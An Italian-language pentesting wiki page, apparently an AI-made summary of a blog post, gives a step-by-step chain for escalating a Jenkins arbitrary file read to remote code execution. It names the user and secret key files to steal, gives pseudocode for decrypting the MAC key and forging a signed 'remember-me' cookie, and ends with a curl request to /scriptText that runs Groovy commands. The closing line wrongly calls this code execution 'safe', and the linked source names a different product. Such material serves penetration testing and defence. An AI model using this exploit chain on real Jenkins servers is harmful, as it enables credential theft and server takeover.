Jenkins Arbitrary File Read to RCE via "Remember Me"

In questo post del blog è possibile trovare un ottimo modo per trasformare una vulnerabilità di Local File Inclusion in Jenkins in RCE: https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/

Questo è un riassunto creato dall'AI della parte del post in cui l'artefatto di un cookie arbitrario viene abusato per ottenere RCE abusando di una lettura di file locale fino a quando non ho tempo per creare un riassunto da solo:

Requisiti per l'attacco

• Requisito di funzionalità: "Ricordami" deve essere abilitato (impostazione predefinita).

• Livelli di accesso: L'attaccante ha bisogno di permessi Generali/Di lettura.

• Accesso segreto: Capacità di leggere sia contenuti binari che testuali da file chiave.

Processo di sfruttamento dettagliato

Passo 1: Raccolta dati

Recupero delle informazioni utente

• Accedere alla configurazione utente e ai segreti da $JENKINS_HOME/users/*.xml per ciascun utente per raccogliere:

• Nome utente

• Seed utente

• Timestamp

• Hash della password

Estrazione della chiave segreta

• Estrarre le chiavi crittografiche utilizzate per firmare il cookie:

• Chiave segreta: $JENKINS_HOME/secret.key

• Chiave master: $JENKINS_HOME/secrets/master.key

• File chiave MAC: $JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac

Passo 2: Forgiatura del cookie

Preparazione del token

• Calcolare il tempo di scadenza del token:

tokenExpiryTime = currentServerTimeInMillis() + 3600000  // Aggiunge un'ora all'ora attuale

• Concatenare i dati per il token:

token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey

Decrittazione della chiave MAC

• Decrittare il file chiave MAC:

key = toAes128Key(masterKey)  // Convertire la chiave master nel formato chiave AES128
decrypted = AES.decrypt(macFile, key)  // Decrittare il file .mac
if not decrypted.hasSuffix("::::MAGIC::::")
return ERROR;
macKey = decrypted.withoutSuffix("::::MAGIC::::")

Calcolo della firma

• Calcolare HMAC SHA256:

mac = HmacSHA256(token, macKey)  // Calcolare HMAC utilizzando il token e la chiave MAC
tokenSignature = bytesToHexString(mac)  // Convertire la MAC in una stringa esadecimale

Codifica del cookie

• Generare il cookie finale:

cookie = base64.encode(username + ":" + tokenExpiryTime + ":" + tokenSignature)  // Codificare in Base64 i dati del cookie

Passo 3: Esecuzione del codice

Autenticazione della sessione

• Recuperare i token CSRF e di sessione:

• Effettuare una richiesta a /crumbIssuer/api/json per ottenere Jenkins-Crumb.

• Catturare JSESSIONID dalla risposta, che sarà utilizzato insieme al cookie "remember-me".

Richiesta di esecuzione del comando

• Inviare una richiesta POST con uno script Groovy:

curl -X POST "$JENKINS_URL/scriptText" \
--cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \
--header "Jenkins-Crumb: $CRUMB" \
--header "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "script=$SCRIPT"

• Lo script Groovy può essere utilizzato per eseguire comandi a livello di sistema o altre operazioni all'interno dell'ambiente Jenkins.

L'esempio di comando curl fornito dimostra come effettuare una richiesta a Jenkins con le intestazioni e i cookie necessari per eseguire codice arbitrario in modo sicuro.